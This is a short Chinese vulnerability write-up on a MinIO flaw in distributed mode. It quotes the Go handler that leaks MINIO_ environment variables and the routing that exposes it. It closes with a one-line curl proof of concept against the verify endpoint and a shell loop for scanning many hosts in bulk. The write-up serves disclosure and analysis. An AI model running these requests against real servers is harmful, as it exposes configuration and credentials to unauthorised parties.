2023年3月

简介

官方给的漏洞代码

// minio/cmd/bootstrap-peer-server.go
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
 ctx := newContext(r, w, "VerifyHandler")
 cfg := getServerSystemCfg()
 logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}

// minio/cmd/bootstrap-peer-server.go
func getServerSystemCfg() ServerSystemConfig {
 envs := env.List("MINIO_")
 envValues := make(map[string]string, len(envs))
 for _, envK := range envs {
   // skip certain environment variables as part
   // of the whitelist and could be configured
   // differently on each nodes, update skipEnvs()
   // map if there are such environment values
   if _, ok := skipEnvs[envK]; ok {
     continue
   }
   envValues[envK] = env.Get(envK, "")
 }
 return ServerSystemConfig{
   MinioEndpoints: globalEndpoints,
   MinioEnv:       envValues,
 }
}

还原一下大概是这样的api router

# /minio/cmd/routers.go
func configureServerHandler(endpointServerPools EndpointServerPools) (http.Handler, error) {
    // Initialize router. `SkipClean(true)` stops minio/mux from
    // normalizing URL path minio/minio#3256
    router := mux.NewRouter().SkipClean(true).UseEncodedPath()

    // Initialize distributed NS lock.
    if globalIsDistErasure {
        registerDistErasureRouters(router, endpointServerPools)
    }
    ...
}

func registerDistErasureRouters(router *mux.Router, endpointServerPools EndpointServerPools) {
    // Register storage REST router only if its a distributed setup.
    registerStorageRESTHandlers(router, endpointServerPools)

    // Register peer REST router only if its a distributed setup.
    registerPeerRESTHandlers(router)

    // Register peer S3 router only if its a distributed setup.
    registerPeerS3Handlers(router)

    // Register bootstrap REST router for distributed setups.
    registerBootstrapRESTHandlers(router) // 这个

    // Register distributed namespace lock routers.
    registerLockRESTHandlers(router)
}
# /minio/cmd/bootstrap-peer-server.go
func registerBootstrapRESTHandlers(router *mux.Router) {
    server := &bootstrapRESTServer{}
    subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()

    subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(
        httpTraceHdrs(server.HealthHandler))

    subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(
        httpTraceHdrs(server.VerifyHandler)) // 这个
}

POC

# 需要开集群模式
curl -XPOST x.x.x.x:9000/minio/bootstrap/v1/verify
# 简单批量检测
for i in `cat mini`; do echo $i;curl -XPOST $i/minio/bootstrap/v1/verify --connect-timeout 3; done


参考链接

https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

https://nosec.org/home/detail/5073.html

Tags

漏洞